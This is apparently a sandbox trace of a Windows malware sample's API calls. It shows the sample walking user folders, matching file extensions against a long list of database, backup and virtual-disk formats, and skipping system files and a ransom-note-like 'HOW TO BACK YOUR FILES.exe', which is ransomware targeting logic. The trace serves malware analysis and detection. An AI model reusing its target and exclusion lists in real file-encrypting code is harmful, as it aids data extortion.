[0040.350] lstrlenW (lpString="zip") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="zip") returned -1 [0040.350] lstrlenW (lpString="tgz") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="tgz") returned -1 [0040.350] lstrlenW (lpString="vbox") returned 4 [0040.350] lstrcmpiW (lpString1=".LOG", lpString2="vbox") returned -1 [0040.350] lstrlenW (lpString="vdi") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="vdi") returned -1 [0040.350] lstrlenW (lpString="vhd") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="vhd") returned -1 [0040.350] lstrlenW (lpString="vhdx") returned 4 [0040.350] lstrcmpiW (lpString1=".LOG", lpString2="vhdx") returned -1 [0040.350] lstrlenW (lpString="avhd") returned 4 [0040.350] lstrcmpiW (lpString1=".LOG", lpString2="avhd") returned -1 [0040.350] lstrlenW (lpString="db") returned 2 [0040.350] lstrcmpiW (lpString1="OG", lpString2="db") returned 1 [0040.350] lstrlenW (lpString="db2") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="db2") returned 1 [0040.350] lstrlenW (lpString="db3") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="db3") returned 1 [0040.350] lstrlenW (lpString="dbf") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="dbf") returned 1 [0040.350] lstrlenW (lpString="mdf") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="mdf") returned -1 [0040.351] lstrlenW (lpString="mdb") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="mdb") returned -1 [0040.351] lstrlenW (lpString="sql") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="sql") returned -1 [0040.351] lstrlenW (lpString="sqlite") returned 6 [0040.351] lstrcmpiW (lpString1="AT.LOG", lpString2="sqlite") returned -1 [0040.351] lstrlenW (lpString="sqlite3") returned 7 [0040.351] lstrcmpiW (lpString1="DAT.LOG", lpString2="sqlite3") returned -1 [0040.351] lstrlenW (lpString="sqlitedb") returned 8 [0040.351] lstrcmpiW (lpString1=".DAT.LOG", lpString2="sqlitedb") returned -1 [0040.351] lstrlenW (lpString="xml") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="xml") returned -1 [0040.351] lstrlenW (lpString="$er") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="$er") returned 1 [0040.351] lstrlenW (lpString="4dd") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="4dd") returned 1 [0040.351] lstrlenW (lpString="4dl") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="4dl") returned 1 [0040.351] lstrlenW (lpString="^^^") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="^^^") returned 1 [0040.351] lstrlenW (lpString="abs") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="abs") returned 1 [0040.351] lstrlenW (lpString="abx") returned 3 [0040.351] lstrcmpiW (lpString1="LOG", lpString2="abx") returned 1 [0040.351] lstrlenW (lpString="accdb") returned 5 [0040.351] lstrcmpiW (lpString1="T.LOG", lpString2="accdb") returned 1 [0040.351] lstrlenW (lpString="accdc") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accdc") returned 1 [0040.352] lstrlenW (lpString="accde") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accde") returned 1 [0040.352] lstrlenW (lpString="accdr") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accdr") returned 1 [0040.352] lstrlenW (lpString="accdt") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accdt") returned 1 [0040.352] lstrlenW (lpString="accdw") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accdw") returned 1 [0040.352] lstrlenW (lpString="accft") returned 5 [0040.352] lstrcmpiW (lpString1="T.LOG", lpString2="accft") returned 1 [0040.352] lstrlenW (lpString="adb") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="adb") returned 1 [0040.352] lstrlenW (lpString="adb") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="adb") returned 1 [0040.352] lstrlenW (lpString="ade") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="ade") returned 1 [0040.352] lstrlenW (lpString="adf") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="adf") returned 1 [0040.352] lstrlenW (lpString="adn") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="adn") returned 1 [0040.352] lstrlenW (lpString="adp") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="adp") returned 1 [0040.352] lstrlenW (lpString="alf") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="alf") returned 1 [0040.352] lstrlenW (lpString="ask") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="ask") returned 1 [0040.352] lstrlenW (lpString="btr") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="btr") returned 1 [0040.352] lstrlenW (lpString="cat") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="cat") returned 1 [0040.352] lstrlenW (lpString="cdb") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="cdb") returned 1 [0040.352] lstrlenW (lpString="ckp") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="ckp") returned 1 [0040.352] lstrlenW (lpString="cma") returned 3 [0040.352] lstrcmpiW (lpString1="LOG", lpString2="cma") returned 1 [0040.353] lstrlenW (lpString="cpd") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="cpd") returned 1 [0040.353] lstrlenW (lpString="dacpac") returned 6 [0040.353] lstrcmpiW (lpString1="AT.LOG", lpString2="dacpac") returned -1 [0040.353] lstrlenW (lpString="dad") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dad") returned 1 [0040.353] lstrlenW (lpString="dadiagrams") returned 10 [0040.353] lstrcmpiW (lpString1="ER.DAT.LOG", lpString2="dadiagrams") returned 1 [0040.353] lstrlenW (lpString="daschema") returned 8 [0040.353] lstrcmpiW (lpString1=".DAT.LOG", lpString2="daschema") returned -1 [0040.353] lstrlenW (lpString="db-journal") returned 10 [0040.353] lstrcmpiW (lpString1="ER.DAT.LOG", lpString2="db-journal") returned 1 [0040.353] lstrlenW (lpString="db-shm") returned 6 [0040.353] lstrcmpiW (lpString1="AT.LOG", lpString2="db-shm") returned -1 [0040.353] lstrlenW (lpString="db-wal") returned 6 [0040.353] lstrcmpiW (lpString1="AT.LOG", lpString2="db-wal") returned -1 [0040.353] lstrlenW (lpString="dbc") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dbc") returned 1 [0040.353] lstrlenW (lpString="dbs") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dbs") returned 1 [0040.353] lstrlenW (lpString="dbt") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dbt") returned 1 [0040.353] lstrlenW (lpString="dbv") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dbv") returned 1 [0040.353] lstrlenW (lpString="dbx") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dbx") returned 1 [0040.353] lstrlenW (lpString="dcb") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dcb") returned 1 [0040.353] lstrlenW (lpString="dct") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dct") returned 1 [0040.353] lstrlenW (lpString="dcx") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="dcx") returned 1 [0040.353] lstrlenW (lpString="ddl") returned 3 [0040.353] lstrcmpiW (lpString1="LOG", lpString2="ddl") returned 1 [0040.353] lstrlenW (lpString="dlis") returned 4 [0040.353] lstrcmpiW (lpString1=".LOG", lpString2="dlis") returned -1 [0040.354] lstrlenW (lpString="dp1") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="dp1") returned 1 [0040.354] lstrlenW (lpString="dqy") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="dqy") returned 1 [0040.354] lstrlenW (lpString="dsk") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="dsk") returned 1 [0040.354] lstrlenW (lpString="dsn") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="dsn") returned 1 [0040.354] lstrlenW (lpString="dtsx") returned 4 [0040.354] lstrcmpiW (lpString1=".LOG", lpString2="dtsx") returned -1 [0040.354] lstrlenW (lpString="dxl") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="dxl") returned 1 [0040.354] lstrlenW (lpString="eco") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="eco") returned 1 [0040.354] lstrlenW (lpString="ecx") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="ecx") returned 1 [0040.354] lstrlenW (lpString="edb") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="edb") returned 1 [0040.354] lstrlenW (lpString="epim") returned 4 [0040.354] lstrcmpiW (lpString1=".LOG", lpString2="epim") returned -1 [0040.354] lstrlenW (lpString="fcd") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="fcd") returned 1 [0040.354] lstrlenW (lpString="fdb") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="fdb") returned 1 [0040.354] lstrlenW (lpString="fic") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="fic") returned 1 [0040.354] lstrlenW (lpString="flexolibrary") returned 12 [0040.354] lstrcmpiW (lpString1="USER.DAT.LOG", lpString2="flexolibrary") returned 1 [0040.354] lstrlenW (lpString="fm5") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="fm5") returned 1 [0040.354] lstrlenW (lpString="fmp") returned 3 [0040.354] lstrcmpiW (lpString1="LOG", lpString2="fmp") returned 1 [0040.354] lstrlenW (lpString="fmp12") returned 5 [0040.354] lstrcmpiW (lpString1="T.LOG", lpString2="fmp12") returned 1 [0040.354] lstrlenW (lpString="fmpsl") returned 5 [0040.354] lstrcmpiW (lpString1="T.LOG", lpString2="fmpsl") returned 1 [0040.355] lstrlenW (lpString="fol") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fol") returned 1 [0040.355] lstrlenW (lpString="fp3") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fp3") returned 1 [0040.355] lstrlenW (lpString="fp4") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fp4") returned 1 [0040.355] lstrlenW (lpString="fp5") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fp5") returned 1 [0040.355] lstrlenW (lpString="fp7") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fp7") returned 1 [0040.355] lstrlenW (lpString="fpt") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="fpt") returned 1 [0040.355] lstrlenW (lpString="frm") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="frm") returned 1 [0040.355] lstrlenW (lpString="gdb") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="gdb") returned 1 [0040.355] lstrlenW (lpString="gdb") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="gdb") returned 1 [0040.355] lstrlenW (lpString="grdb") returned 4 [0040.355] lstrcmpiW (lpString1=".LOG", lpString2="grdb") returned -1 [0040.355] lstrlenW (lpString="gwi") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="gwi") returned 1 [0040.355] lstrlenW (lpString="hdb") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="hdb") returned 1 [0040.355] lstrlenW (lpString="his") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="his") returned 1 [0040.355] lstrlenW (lpString="ib") returned 2 [0040.355] lstrcmpiW (lpString1="OG", lpString2="ib") returned 1 [0040.355] lstrlenW (lpString="idb") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="idb") returned 1 [0040.355] lstrlenW (lpString="ihx") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="ihx") returned 1 [0040.355] lstrlenW (lpString="itdb") returned 4 [0040.355] lstrcmpiW (lpString1=".LOG", lpString2="itdb") returned -1 [0040.355] lstrlenW (lpString="itw") returned 3 [0040.355] lstrcmpiW (lpString1="LOG", lpString2="itw") returned 1 [0040.356] lstrlenW (lpString="jet") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="jet") returned 1 [0040.356] lstrlenW (lpString="jtx") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="jtx") returned 1 [0040.356] lstrlenW (lpString="kdb") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="kdb") returned 1 [0040.356] lstrlenW (lpString="kexi") returned 4 [0040.356] lstrcmpiW (lpString1=".LOG", lpString2="kexi") returned -1 [0040.356] lstrlenW (lpString="kexic") returned 5 [0040.356] lstrcmpiW (lpString1="T.LOG", lpString2="kexic") returned 1 [0040.356] lstrlenW (lpString="kexis") returned 5 [0040.356] lstrcmpiW (lpString1="T.LOG", lpString2="kexis") returned 1 [0040.356] lstrlenW (lpString="lgc") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="lgc") returned 1 [0040.356] lstrlenW (lpString="lwx") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="lwx") returned -1 [0040.356] lstrlenW (lpString="maf") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="maf") returned -1 [0040.356] lstrlenW (lpString="maq") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="maq") returned -1 [0040.356] lstrlenW (lpString="mar") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="mar") returned -1 [0040.356] lstrlenW (lpString="marshal") returned 7 [0040.356] lstrcmpiW (lpString1="DAT.LOG", lpString2="marshal") returned -1 [0040.356] lstrlenW (lpString="mas") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="mas") returned -1 [0040.356] lstrlenW (lpString="mav") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="mav") returned -1 [0040.356] lstrlenW (lpString="maw") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="maw") returned -1 [0040.356] lstrlenW (lpString="mdbhtml") returned 7 [0040.356] lstrcmpiW (lpString1="DAT.LOG", lpString2="mdbhtml") returned -1 [0040.356] lstrlenW (lpString="mdn") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="mdn") returned -1 [0040.356] lstrlenW (lpString="mdt") returned 3 [0040.356] lstrcmpiW (lpString1="LOG", lpString2="mdt") returned -1 [0040.356] lstrlenW (lpString="mfd") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="mfd") returned -1 [0040.357] lstrlenW (lpString="mpd") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="mpd") returned -1 [0040.357] lstrlenW (lpString="mrg") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="mrg") returned -1 [0040.357] lstrlenW (lpString="mud") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="mud") returned -1 [0040.357] lstrlenW (lpString="mwb") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="mwb") returned -1 [0040.357] lstrlenW (lpString="myd") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="myd") returned -1 [0040.357] lstrlenW (lpString="ndf") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="ndf") returned -1 [0040.357] lstrlenW (lpString="nnt") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="nnt") returned -1 [0040.357] lstrlenW (lpString="nrmlib") returned 6 [0040.357] lstrcmpiW (lpString1="AT.LOG", lpString2="nrmlib") returned -1 [0040.357] lstrlenW (lpString="ns2") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="ns2") returned -1 [0040.357] lstrlenW (lpString="ns3") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="ns3") returned -1 [0040.357] lstrlenW (lpString="ns4") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="ns4") returned -1 [0040.357] lstrlenW (lpString="nsf") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="nsf") returned -1 [0040.357] lstrlenW (lpString="nv") returned 2 [0040.357] lstrcmpiW (lpString1="OG", lpString2="nv") returned 1 [0040.357] lstrlenW (lpString="nv2") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="nv2") returned -1 [0040.357] lstrlenW (lpString="nwdb") returned 4 [0040.357] lstrcmpiW (lpString1=".LOG", lpString2="nwdb") returned -1 [0040.357] lstrlenW (lpString="nyf") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="nyf") returned -1 [0040.357] lstrlenW (lpString="odb") returned 3 [0040.357] lstrcmpiW (lpString1="LOG", lpString2="odb") returned -1 [0040.357] lstrlenW (lpString="odb") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="odb") returned -1 [0040.358] lstrlenW (lpString="oqy") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="oqy") returned -1 [0040.358] lstrlenW (lpString="ora") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="ora") returned -1 [0040.358] lstrlenW (lpString="orx") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="orx") returned -1 [0040.358] lstrlenW (lpString="owc") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="owc") returned -1 [0040.358] lstrlenW (lpString="p96") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="p96") returned -1 [0040.358] lstrlenW (lpString="p97") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="p97") returned -1 [0040.358] lstrlenW (lpString="pan") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="pan") returned -1 [0040.358] lstrlenW (lpString="pdb") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="pdb") returned -1 [0040.358] lstrlenW (lpString="pdm") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="pdm") returned -1 [0040.358] lstrlenW (lpString="pnz") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="pnz") returned -1 [0040.358] lstrlenW (lpString="qry") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="qry") returned -1 [0040.358] lstrlenW (lpString="qvd") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="qvd") returned -1 [0040.358] lstrlenW (lpString="rbf") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="rbf") returned -1 [0040.358] lstrlenW (lpString="rctd") returned 4 [0040.358] lstrcmpiW (lpString1=".LOG", lpString2="rctd") returned -1 [0040.358] lstrlenW (lpString="rod") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="rod") returned -1 [0040.358] lstrlenW (lpString="rodx") returned 4 [0040.358] lstrcmpiW (lpString1=".LOG", lpString2="rodx") returned -1 [0040.358] lstrlenW (lpString="rpd") returned 3 [0040.358] lstrcmpiW (lpString1="LOG", lpString2="rpd") returned -1 [0040.359] lstrlenW (lpString="rsd") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="rsd") returned -1 [0040.359] lstrlenW (lpString="sas7bdat") returned 8 [0040.359] lstrcmpiW (lpString1=".DAT.LOG", lpString2="sas7bdat") returned -1 [0040.359] lstrlenW (lpString="sbf") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="sbf") returned -1 [0040.359] lstrlenW (lpString="scx") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="scx") returned -1 [0040.359] lstrlenW (lpString="sdb") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="sdb") returned -1 [0040.359] lstrlenW (lpString="sdc") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="sdc") returned -1 [0040.359] lstrlenW (lpString="sdf") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="sdf") returned -1 [0040.359] lstrlenW (lpString="sis") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="sis") returned -1 [0040.359] lstrlenW (lpString="spq") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="spq") returned -1 [0040.359] lstrlenW (lpString="te") returned 2 [0040.359] lstrcmpiW (lpString1="OG", lpString2="te") returned -1 [0040.359] lstrlenW (lpString="teacher") returned 7 [0040.359] lstrcmpiW (lpString1="DAT.LOG", lpString2="teacher") returned -1 [0040.359] lstrlenW (lpString="tmd") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="tmd") returned -1 [0040.359] lstrlenW (lpString="tps") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="tps") returned -1 [0040.359] lstrlenW (lpString="trc") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="trc") returned -1 [0040.359] lstrlenW (lpString="trc") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="trc") returned -1 [0040.359] lstrlenW (lpString="trm") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="trm") returned -1 [0040.359] lstrlenW (lpString="udb") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="udb") returned -1 [0040.359] lstrlenW (lpString="udl") returned 3 [0040.359] lstrcmpiW (lpString1="LOG", lpString2="udl") returned -1 [0040.360] lstrlenW (lpString="usr") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="usr") returned -1 [0040.360] lstrlenW (lpString="v12") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="v12") returned -1 [0040.360] lstrlenW (lpString="vis") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="vis") returned -1 [0040.360] lstrlenW (lpString="vpd") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="vpd") returned -1 [0040.360] lstrlenW (lpString="vvv") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="vvv") returned -1 [0040.360] lstrlenW (lpString="wdb") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="wdb") returned -1 [0040.360] lstrlenW (lpString="wmdb") returned 4 [0040.360] lstrcmpiW (lpString1=".LOG", lpString2="wmdb") returned -1 [0040.360] lstrlenW (lpString="wrk") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="wrk") returned -1 [0040.360] lstrlenW (lpString="xdb") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="xdb") returned -1 [0040.360] lstrlenW (lpString="xld") returned 3 [0040.360] lstrcmpiW (lpString1="LOG", lpString2="xld") returned -1 [0040.360] lstrlenW (lpString="xmlff") returned 5 [0040.360] lstrcmpiW (lpString1="T.LOG", lpString2="xmlff") returned -1 [0040.360] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="aoldtz.exe") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="windows") returned -1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="bootmgr") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="temp") returned -1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="pagefile.sys") returned -1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="boot") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ids.txt") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat") returned 1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="perflogs") returned -1 [0040.360] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="MSBuild") returned 1 [0040.361] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0040.361] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT.LOG") returned 36 [0040.361] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0040.361] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0040.361] lstrlenW (lpString="Ares865") returned 7 [0040.361] lstrcmpiW (lpString1="AT.LOG1", lpString2="Ares865") returned 1 [0040.361] lstrlenW (lpString=".dll") returned 4 [0040.361] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".dll") returned 1 [0040.361] lstrlenW (lpString=".lnk") returned 4 [0040.361] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".lnk") returned 1 [0040.361] lstrlenW (lpString=".ini") returned 4 [0040.361] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".ini") returned 1 [0040.361] lstrlenW (lpString=".sys") returned 4 [0040.361] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".sys") returned 1 [0040.361] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0040.361] lstrlenW (lpString="bak") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="bak") returned 1 [0040.361] lstrlenW (lpString="ba_") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="ba_") returned 1 [0040.361] lstrlenW (lpString="dbb") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="dbb") returned 1 [0040.361] lstrlenW (lpString="vmdk") returned 4 [0040.361] lstrcmpiW (lpString1="LOG1", lpString2="vmdk") returned -1 [0040.361] lstrlenW (lpString="rar") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="rar") returned -1 [0040.361] lstrlenW (lpString="zip") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="zip") returned -1 [0040.361] lstrlenW (lpString="tgz") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="tgz") returned -1 [0040.361] lstrlenW (lpString="vbox") returned 4 [0040.361] lstrcmpiW (lpString1="LOG1", lpString2="vbox") returned -1 [0040.361] lstrlenW (lpString="vdi") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="vdi") returned -1 [0040.361] lstrlenW (lpString="vhd") returned 3 [0040.361] lstrcmpiW (lpString1="OG1", lpString2="vhd") returned -1 [0040.361] lstrlenW (lpString="vhdx") returned 4 [0040.362] lstrcmpiW (lpString1="LOG1", lpString2="vhdx") returned -1 [0040.362] lstrlenW (lpString="avhd") returned 4 [0040.362] lstrcmpiW (lpString1="LOG1", lpString2="avhd") returned 1 [0040.362] lstrlenW (lpString="db") returned 2 [0040.362] lstrcmpiW (lpString1="G1", lpString2="db") returned 1 [0040.362] lstrlenW (lpString="db2") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="db2") returned 1 [0040.362] lstrlenW (lpString="db3") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="db3") returned 1 [0040.362] lstrlenW (lpString="dbf") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="dbf") returned 1 [0040.362] lstrlenW (lpString="mdf") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="mdf") returned 1 [0040.362] lstrlenW (lpString="mdb") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="mdb") returned 1 [0040.362] lstrlenW (lpString="sql") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="sql") returned -1 [0040.362] lstrlenW (lpString="sqlite") returned 6 [0040.362] lstrcmpiW (lpString1="T.LOG1", lpString2="sqlite") returned 1 [0040.362] lstrlenW (lpString="sqlite3") returned 7 [0040.362] lstrcmpiW (lpString1="AT.LOG1", lpString2="sqlite3") returned -1 [0040.362] lstrlenW (lpString="sqlitedb") returned 8 [0040.362] lstrcmpiW (lpString1="DAT.LOG1", lpString2="sqlitedb") returned -1 [0040.362] lstrlenW (lpString="xml") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="xml") returned -1 [0040.362] lstrlenW (lpString="$er") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="$er") returned 1 [0040.362] lstrlenW (lpString="4dd") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="4dd") returned 1 [0040.362] lstrlenW (lpString="4dl") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="4dl") returned 1 [0040.362] lstrlenW (lpString="^^^") returned 3 [0040.362] lstrcmpiW (lpString1="OG1", lpString2="^^^") returned 1 [0040.362] lstrlenW (lpString="abs") returned 3 